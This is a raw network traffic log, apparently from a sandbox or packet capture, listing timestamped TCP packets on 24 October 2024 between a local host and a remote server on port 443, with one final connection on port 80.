Oct 24, 2024 03:40:47.510555029 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.514333010 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.514379025 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.514425993 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.514426947 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.514493942 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.514556885 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.613964081 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.614025116 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.614253044 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.614253044 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.614320993 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.614401102 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.615871906 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.615932941 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.615947962 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.616007090 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.622853041 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.622893095 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.623019934 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.623020887 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.623087883 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.623167992 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.634905100 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.635020018 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.635041952 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.635077000 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.635077953 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.635143042 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.635201931 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.635201931 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.635282040 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.635437012 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.635498047 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.635574102 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941560984 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941617012 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941637039 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941725016 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941746950 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941765070 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941766024 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941766024 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941766024 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941837072 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941896915 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941898108 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941919088 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941951036 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941970110 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.941975117 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941986084 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.941988945 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.942018986 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.942019939 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.942042112 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.942059994 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.942085981 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.942142963 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.943623066 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943794012 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.943800926 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943821907 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943830967 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943844080 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.943867922 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943880081 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.943923950 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943963051 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.943985939 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.943991899 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944008112 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.944037914 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944056988 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.944061041 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944075108 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.944106102 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944125891 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.944130898 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944145918 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.944175005 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944199085 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.944211006 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.944271088 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.947525024 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.947726011 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.964596033 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.964767933 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.964831114 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.964896917 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.966558933 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.966742039 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.966803074 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.966869116 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.973586082 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.973649979 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.973738909 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.973938942 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.985799074 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.985974073 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.986036062 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.986112118 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.986126900 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.986190081 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:47.986217022 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:47.986270905 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.028960943 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.029129982 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.029191017 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.029253006 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.081523895 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.081553936 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.081574917 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.081584930 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.081593037 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.081603050 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.081604958 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.081619024 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.081635952 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.083298922 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.083357096 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.083436012 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.083484888 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.090485096 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.090542078 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.090583086 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.090677023 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.103295088 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.103411913 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.103441954 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.103451967 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.103598118 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.103598118 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.103646994 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.103713036 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.145869017 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.146035910 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.146097898 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.146172047 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.198421955 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.198585987 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.198647022 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.198720932 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.200241089 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.200428963 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.200490952 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.200556040 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.207459927 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.207654953 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.207716942 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.207786083 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219588995 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219640017 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219662905 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219698906 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219710112 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219738007 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219768047 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219788074 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219806910 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219842911 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219854116 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219868898 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.219897032 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.219918966 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.262917995 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.263119936 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.263183117 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.263241053 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.315202951 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.315395117 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.315457106 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.315526009 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.317138910 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.317354918 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.317372084 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.317426920 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.317472935 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.317472935 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.324419022 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.324476004 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.324502945 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.324579954 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.336437941 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.336632013 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.336698055 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.336816072 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.336837053 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.336859941 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.336991072 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.336991072 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.336991072 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.336991072 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.337069988 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.337126017 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.379863024 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.380028963 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.380089998 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.380151033 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.432240963 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.432406902 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.432468891 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.432537079 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.434511900 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.434541941 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.434689999 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.434689999 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.434758902 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.434818029 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.436933041 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.436986923 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.441268921 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.441319942 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.441335917 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.441411018 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.453403950 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.453466892 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.453496933 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.453530073 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.453552008 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.453551054 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.453571081 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.453599930 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.453599930 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.453629971 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.453640938 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.453700066 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.496864080 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.497030020 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.497101068 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.497176886 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.549401999 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.549592972 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.549654961 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.549726009 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.551027060 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.551191092 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.551222086 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.551278114 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.558294058 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.558329105 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.558408976 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.558502913 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.558502913 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.558538914 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.558607101 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.570271969 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570410013 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570430040 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570450068 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570471048 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570489883 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570647001 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.570647955 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.570647955 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.570715904 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.570780039 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.613678932 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.616384983 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.616446972 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.616754055 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.666524887 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.666558027 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.666744947 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.666809082 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.666871071 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.667722940 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.667779922 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.667797089 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.667865038 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.675074100 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.675273895 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.675338984 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.675354004 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.675427914 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.675652981 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.675704002 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.687061071 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.687271118 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.687347889 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.687355042 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.687376022 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.687408924 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.687428951 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.687428951 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.687442064 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.687500000 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.687500954 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.687536001 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.688177109 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.730724096 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.732079029 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.732140064 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.732389927 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.783108950 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.783153057 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.783183098 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.783318996 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.783318996 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.783386946 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.783941031 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.784584045 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.784749985 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.784811974 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.785739899 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.791965008 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.792272091 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.792289972 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.792490959 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.792557001 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.792623043 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.792623043 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.803945065 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.804053068 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.804119110 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.804143906 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.804250956 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.804250956 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.804251909 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.804320097 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.804677010 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.850395918 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.850488901 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.850517988 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.850559950 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.850658894 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:48.850692034 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.850692987 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.850692987 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.850775957 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.851022959 CEST	49882	443	192.168.2.4	142.250.186.161
Oct 24, 2024 03:40:48.851085901 CEST	443	49882	142.250.186.161	192.168.2.4
Oct 24, 2024 03:40:49.844922066 CEST	49918	80	192.168.2.4	132.226.8.169
